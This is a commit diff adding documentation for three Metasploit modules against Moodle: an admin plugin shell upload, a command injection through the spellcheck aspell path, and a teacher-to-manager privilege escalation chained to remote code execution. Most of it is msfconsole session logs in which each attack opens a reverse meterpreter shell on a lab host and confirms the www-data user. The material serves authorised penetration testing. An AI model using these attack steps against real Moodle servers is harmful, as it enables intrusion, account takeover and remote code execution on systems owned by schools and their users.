Land #15612, Add multiple moodle modules

2021-10-11 23:18:55 +01:00
parent 8b9b1092f6 59aa525ecb
commit dcb42da269
17 changed files with 1718 additions and 156 deletions
@@ -0,0 +1,232 @@
+## Vulnerable Application
+
+This module will generate a plugin which can receive a malicious
+payload request and upload it to a server running Moodle
+provided valid admin credentials are used.  Then the payload
+is sent for execution, and the plugin uninstalled.
+
+You must have an admin account to exploit this vulnerability.
+
+Successfully tested against 3.6.3, 3.8.0, 3.9.0, 3.10.0, 3.11.2
+
+## Verification Steps
+
+1. Install moodle
+1. Start msfconsole
+1. Do: `use exploits/multi/http/moodle_admin_shell_upload`
+1. Do: `set username [username]`
+1. Do: `set password [password]`
+1. Do: `run`
+1. You should get a shell.
+
+## Options
+
+### Username
+
+Username for an admin user. Default is `admin`
+
+### Password
+
+Password for an admin user
+
+## Scenarios
+
+### Moodle 3.8.0 on Ubuntu 20.04
+
+```
+resource (moodle_upload.rb)> use exploits/multi/http/moodle_admin_shell_upload
+[*] Using configured payload php/meterpreter/reverse_tcp
+resource (moodle_upload.rb)> set rhosts 2.2.2.2
+rhosts => 2.2.2.2
+resource (moodle_upload.rb)> set username admin
+username => admin
+resource (moodle_upload.rb)> set password Adminadmin1!
+password => Adminadmin1!
+resource (moodle_upload.rb)> set targeturi /moodle-3.8.0/
+targeturi => /moodle-3.8.0/
+resource (moodle_upload.rb)> set payload payload/php/meterpreter/reverse_tcp
+payload => php/meterpreter/reverse_tcp
+resource (moodle_upload.rb)> set lhost eth0
+lhost => eth0
+resource (moodle_upload.rb)> exploit
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Exploitable Moodle version 3.8 detected
+[*] Authenticating as user: admin
+[+] Authentication was successful with user: admin
+[*] Creating addon file
+[*] Creating plugin named: oganetpo with poisoned header: YLYF
+[*] Uploading addon
+[+] Upload Successful.  Integrating addon
+[*] Triggering payload
+[*] Sending stage (39282 bytes) to 2.2.2.2
+[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:56312) at 2021-09-02 17:05:39 -0400
+[*] Uninstalling plugin
+
+meterpreter > sysinfo
+Computer    : moodle
+OS          : Linux moodle 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64
+Meterpreter : php/linux
+meterpreter > getuid
+Server username: www-data (33)
+```
+
+### Moodle 3.6.3 on Ubuntu 20.04
+
+```
+resource (moodle_upload.rb)> use exploits/multi/http/moodle_admin_shell_upload
+[*] Using configured payload php/meterpreter/reverse_tcp
+resource (moodle_upload.rb)> set rhosts 2.2.2.2
+rhosts => 2.2.2.2
+resource (moodle_upload.rb)> set username admin
+username => admin
+resource (moodle_upload.rb)> set password Adminadmin1!
+password => Adminadmin1!
+resource (moodle_upload.rb)> set targeturi /moodle-3.6.3/
+targeturi => /moodle-3.6.3/
+resource (moodle_upload.rb)> set payload payload/php/meterpreter/reverse_tcp
+payload => php/meterpreter/reverse_tcp
+resource (moodle_upload.rb)> set lhost eth0
+lhost => eth0
+resource (moodle_upload.rb)> exploit
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Exploitable Moodle version 3.6.3 detected
+[*] Authenticating as user: admin
+[+] Authentication was successful with user: admin
+[*] Creating addon file
+[*] Creating plugin named: vnckinyr with poisoned header: BMDI
+[*] Uploading addon
+[+] Upload Successful.  Integrating addon
+[*] Triggering payload
+[*] Sending stage (39282 bytes) to 2.2.2.2
+[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:56316) at 2021-09-02 17:09:41 -0400
+[*] Uninstalling plugin
+
+meterpreter > sysinfo
+Computer    : moodle
+OS          : Linux moodle 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64
+Meterpreter : php/linux
+meterpreter > getuid
+Server username: www-data (33)
+```
+
+### Moodle 3.9.0 on Ubuntu 20.04
+
+```
+resource (moodle_upload.rb)> use exploits/multi/http/moodle_admin_shell_upload
+[*] Using configured payload php/meterpreter/reverse_tcp
+resource (moodle_upload.rb)> set rhosts 2.2.2.2
+rhosts => 2.2.2.2
+resource (moodle_upload.rb)> set username admin
+username => admin
+resource (moodle_upload.rb)> set password Adminadmin1!
+password => Adminadmin1!
+resource (moodle_upload.rb)> set targeturi /moodle-3.9.0/
+targeturi => /moodle-3.9.0/
+resource (moodle_upload.rb)> set payload payload/php/meterpreter/reverse_tcp
+payload => php/meterpreter/reverse_tcp
+resource (moodle_upload.rb)> set lhost eth0
+lhost => eth0
+resource (moodle_upload.rb)> exploit
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Exploitable Moodle version 3.9 detected
+[*] Authenticating as user: admin
+[+] Authentication was successful with user: admin
+[*] Creating addon file
+[*] Creating plugin named: taztsyap with poisoned header: ARHW
+[*] Uploading addon
+[+] Upload Successful.  Integrating addon
+[*] Triggering payload
+[*] Sending stage (39282 bytes) to 2.2.2.2
+[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:56318) at 2021-09-02 17:11:20 -0400
+[*] Uninstalling plugin
+
+meterpreter > sysinfo
+Computer    : moodle
+OS          : Linux moodle 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64
+Meterpreter : php/linux
+meterpreter > getuid
+Server username: www-data (33)
+```
+
+### Moodle 3.10.0 on Ubuntu 20.04
+
+```
+resource (moodle_upload.rb)> use exploits/multi/http/moodle_admin_shell_upload
+[*] Using configured payload php/meterpreter/reverse_tcp
+resource (moodle_upload.rb)> set rhosts 2.2.2.2
+rhosts => 2.2.2.2
+resource (moodle_upload.rb)> set username admin
+username => admin
+resource (moodle_upload.rb)> set password Adminadmin1!
+password => Adminadmin1!
+resource (moodle_upload.rb)> set targeturi /moodle-3.10.0/
+targeturi => /moodle-3.10.0/
+resource (moodle_upload.rb)> set payload payload/php/meterpreter/reverse_tcp
+payload => php/meterpreter/reverse_tcp
+resource (moodle_upload.rb)> set lhost eth0
+lhost => eth0
+resource (moodle_upload.rb)> exploit
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Exploitable Moodle version 3.10 detected
+[*] Authenticating as user: admin
+[+] Authentication was successful with user: admin
+[*] Creating addon file
+[*] Creating plugin named: yciymtns with poisoned header: YBIT
+[*] Uploading addon
+[+] Upload Successful.  Integrating addon
+[*] Triggering payload
+[*] Sending stage (39282 bytes) to 2.2.2.2
+[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:56320) at 2021-09-02 17:16:52 -0400
+[*] Uninstalling plugin
+
+meterpreter > sysinfo
+Computer    : moodle
+OS          : Linux moodle 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64
+Meterpreter : php/linux
+meterpreter > getuid
+Server username: www-data (33)
+```
+
+### Moodle 3.11.2 on Ubuntu 20.04
+
+```
+resource (moodle_upload.rb)> use exploits/multi/http/moodle_admin_shell_upload
+[*] Using configured payload php/meterpreter/reverse_tcp
+resource (moodle_upload.rb)> set rhosts 2.2.2.2
+rhosts => 2.2.2.2
+resource (moodle_upload.rb)> set username admin
+username => admin
+resource (moodle_upload.rb)> set password Adminadmin1!
+password => Adminadmin1!
+resource (moodle_upload.rb)> set targeturi /moodle-3.11.2/
+targeturi => /moodle-3.11.2/
+resource (moodle_upload.rb)> set payload payload/php/meterpreter/reverse_tcp
+payload => php/meterpreter/reverse_tcp
+resource (moodle_upload.rb)> set lhost eth0
+lhost => eth0
+resource (moodle_upload.rb)> exploit
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Exploitable Moodle version 3.11.2 detected
+[*] Authenticating as user: admin
+[+] Authentication was successful with user: admin
+[*] Creating addon file
+[*] Creating plugin named: fwjdzsuj with poisoned header: ZLCW
+[*] Uploading addon
+[+] Upload Successful.  Integrating addon
+[*] Triggering payload
+[*] Sending stage (39282 bytes) to 2.2.2.2
+[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:56326) at 2021-09-02 17:27:06 -0400
+[*] Uninstalling plugin
+
+meterpreter > sysinfo
+Computer    : moodle
+OS          : Linux moodle 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64
+Meterpreter : php/linux
+meterpreter > getuid
+Server username: www-data (33)
+```
@@ -0,0 +1,118 @@
+## Vulnerable Application
+
+Moodle allows an authenticated administrator to define spellcheck settings via the web interface.
+An administrator can update the aspell path to include a command injection. This is extremely
+similar to CVE-2013-3630, just using a different variable.
+
+This module was tested against Moodle version 3.11.2, 3.10.0, and 3.8.0. Based on the
+Talos advisory: `2021-04-21 - Vendor updated documentation to suggest best practices after installation`,
+it is unclear if Moodle will patch this.  Therefore it is unclear what the upper bounds
+is on exploitation.
+
+### Install
+
+Moodle provides a step by step guide to install their software
+[here](https://docs.moodle.org/311/en/Step-by-step_Installation_Guide_for_Ubuntu)
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use exploits/multi/http/moodle_spelling_path_rce`
+1. Do: `set username [username]`
+1. Do: `set password [password]`
+1. Do: `run`
+1. You should get a shell.
+
+## Options
+
+### Passowrd
+
+Password of an administrator.
+
+### Username
+
+Username of an administrator. Defaults to `admin`
+
+## Scenarios
+
+### Moodle 3.10.0 on Ubuntu 20.04
+
+```
+[*] Processing moodle_spellcheck.rb for ERB directives.
+resource (moodle_spellcheck.rb)> use exploits/multi/http/moodle_spelling_path_rce
+[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
+resource (moodle_spellcheck.rb)> set rhosts 2.2.2.2
+rhosts => 2.2.2.2
+resource (moodle_spellcheck.rb)> set username admin
+username => admin
+resource (moodle_spellcheck.rb)> set password Adminadmin1!
+password => Adminadmin1!
+resource (moodle_spellcheck.rb)> set targeturi /moodle-3.10.0/
+targeturi => /moodle-3.10.0/
+resource (moodle_spellcheck.rb)> set payload payload/php/meterpreter/reverse_tcp
+payload => php/meterpreter/reverse_tcp
+resource (moodle_spellcheck.rb)> set proxies http:127.0.0.1:8080
+proxies => http:127.0.0.1:8080
+resource (moodle_spellcheck.rb)> set ReverseAllowProxy true
+ReverseAllowProxy => true
+resource (moodle_spellcheck.rb)> set lhost eth0
+lhost => eth0
+resource (moodle_spellcheck.rb)> exploit
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Exploitable Moodle version 3.10 detected
+[*] Authenticating as user: admin
+[*] Updating aspell path
+[*] Changing spell engine to PSpellShell
+[*] Triggering payload
+[*] Sending stage (39282 bytes) to 2.2.2.2
+[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:56124) at 2021-08-29 10:03:37 -0400
+[*] Sleeping 5 seconds before cleanup
+[*] Authenticating as user: admin
+[*] Removing RCE from settings
+
+meterpreter > getuid
+Server username: www-data (33)
+meterpreter > sysinfo
+Computer    : moodle
+OS          : Linux moodle 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64
+Meterpreter : php/linux
+```
+
+### Moodle 3.11.2 on Ubuntu 20.04
+
+```
+resource (moodle_spellcheck.rb)> set rhosts 2.2.2.2
+rhosts => 2.2.2.2
+resource (moodle_spellcheck.rb)> set username admin
+username => admin
+resource (moodle_spellcheck.rb)> set password Adminadmin1!
+password => Adminadmin1!
+resource (moodle_spellcheck.rb)> set targeturi /moodle-3.11.2/
+targeturi => /moodle-3.11.2/
+resource (moodle_spellcheck.rb)> set payload payload/php/meterpreter/reverse_tcp
+payload => php/meterpreter/reverse_tcp
+resource (moodle_spellcheck.rb)> set lhost eth0
+lhost => eth0
+resource (moodle_spellcheck.rb)> exploit
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Exploitable Moodle version 3.11.2 detected
+[*] Authenticating as user: admin
+[*] Updating aspell path
+[*] Changing spell engine to PSpellShell
+[*] Triggering payload
+[*] Sending stage (39282 bytes) to 2.2.2.2
+[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:56130) at 2021-08-29 10:22:03 -0400
+[*] Sleeping 5 seconds before cleanup
+[*] Authenticating as user: admin
+[*] Removing RCE from settings
+
+meterpreter > sysinfo
+Computer    : moodle
+OS          : Linux moodle 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64
+Meterpreter : php/linux
+meterpreter > getuid
+Server username: www-data (33)
+```
@@ -0,0 +1,119 @@
+## Vulnerable Application
+
+Moodle version 3.9, 3.8 to 3.8.3, 3.7 to 3.7.6, 3.5 to 3.5.12 and earlier unsupported versions
+allow for a teacher to exploit chain to RCE.  A bug in the privileges system allows a teacher
+to add themselves as a manager to their own class. They can then add any other users, and thus
+look to add someone with manager privileges on the system (not just the class).  After
+adding a system manager, a 'loginas' feature is used to access their account.  Next the system
+is reconfigured to allow for all users to install an addon/plugin.  Then a malicious theme
+is uploaded and creates an RCE.
+
+If all of that is a success, we revert permissions for managers to system default and
+remove our malicoius theme.  Manual cleanup to remove students from the class is required.
+
+This module was tested against Moodle version 3.9
+
+### Install
+
+Moodle provides a step by step guide to install their software.  However you'll want to use
+`3.9.0` isntead of `3.11.0`.
+[here](https://docs.moodle.org/311/en/Step-by-step_Installation_Guide_for_Ubuntu)
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use exploits/multi/http/moodle_teacher_enrollment_priv_esc_to_rce`
+1. Do: `set username [username]`
+1. Do: `set password [password]`
+1. Do: `run`
+1. You should get a shell.
+
+## Options
+
+### MAXUSERS
+
+The amount of users to add to the class in hopes of finding a manager. Defaults to `100`.
+
+### Passowrd
+
+Password of a teacher.
+
+### Username
+
+Username of a teacher.
+
+## Scenarios
+
+### Moodle 3.9.0 on Ubuntu 20.04
+
+```
+resource (moodle_privesc.rb)> use exploit/multi/http/moodle_teacher_enrollment_priv_esc_to_rce
+[*] Using configured payload php/meterpreter/reverse_tcp
+resource (moodle_privesc.rb)> set rhosts 2.2.2.2
+rhosts => 2.2.2.2
+resource (moodle_privesc.rb)> set targeturi /moodle-3.9.0/
+targeturi => /moodle-3.9.0/
+resource (moodle_privesc.rb)> set username teacher
+username => teacher
+resource (moodle_privesc.rb)> set password Teacherteacher1!
+password => Teacherteacher1!
+resource (moodle_privesc.rb)> set lhost eth0
+lhost => eth0
+resource (moodle_privesc.rb)> set MAXUSERS 10
+MAXUSERS => 10
+resource (moodle_privesc.rb)> run
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Exploitable Moodle version 3.9 detected
+[*] Authenticating as user: teacher
+[*] Retrieving user info
+[+] User ID: 4
+[+] Course ID: 2
+[+] Sessionkey: R1lSAKDT73
+[*] Retrieving course enrollment id
+[+] Enrol ID: 1
+[*] Attempting to enrolin in class as manager (priv esc)
+[+] Successfully enrolled
+[*] Attempting to find and add a manager to class
+[*] Attempting user: 2
+[+] Successfully enrolled
+[*] Attempting user: 3
+[+] Successfully enrolled
+[*] Attempting user: 4
+[+] Successfully enrolled
+[*] Attempting user: 5
+[+] Successfully enrolled
+[*] Attempting user: 6
+[-] Unsuccessful
+[*] Attempting user: 7
+[-] Unsuccessful
+[*] Attempting user: 8
+[-] Unsuccessful
+[*] Attempting user: 9
+[-] Unsuccessful
+[*] Retrieving course context id
+[+] Context ID: 28
+[+] Found manager user IDs: ["5", "4"]
+[*] Attempting loginas for user id: 5
+[*] Logged in as: manager manager
+[+] Looks like a potentially good manager account!
+[*] Attempting via new session key: gUocfkXDpe
+[*] Checking if permissions were set successfully
+[+] Manager roll full permissioned, attempting to upload shell
+[*] Creating plugin named: mbdzduot with poisoned header: PIYB
+[*] Uploading addon
+[+] Upload Successful.  Integrating addon
+[*] Triggering payload
+[*] Sending stage (39282 bytes) to 2.2.2.2
+[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:56418) at 2021-09-04 13:21:51 -0400
+[*] Uninstalling plugin
+[*] Resetting permissions
+
+meterpreter > sysinfo
+Computer    : moodle
+OS          : Linux moodle 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64
+Meterpreter : php/linux
+meterpreter > getuid
+Server username: www-data (33)
+```